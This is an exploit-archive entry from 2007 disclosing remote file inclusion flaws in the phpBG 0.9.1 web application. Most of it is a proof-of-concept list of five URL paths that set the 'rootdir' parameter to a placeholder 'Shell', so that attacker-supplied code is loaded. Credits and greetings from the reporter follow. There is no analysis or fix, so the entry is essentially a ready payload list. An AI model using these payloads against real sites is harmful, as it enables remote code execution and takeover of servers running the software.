phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities

2007-08-29T00:00:00
ID 1337DAY-ID-2098
Type zdt
Reporter GoLd_M
Modified 2007-08-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities
===========================================================



# phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerability
# D.Script: http://phpbg.sourceforge.net/
# POC:
#   /intern/admin/other/backup.php?admin=1&rootdir=Shell
#   /intern/admin/?rootdir=Shell
#   /intern/clan/member_add.php?rootdir=Shell
#   /intern/config/key_2.php?rootdir=Shell
#   /intern/config/forum.php?rootdir=Shell
# Discovered by: GoLd_M = [Mahmood_ali]
# Thanx To : Tryag-Team & Asbmay's Group & All My Friends



#  0day.today [2018-04-11]  #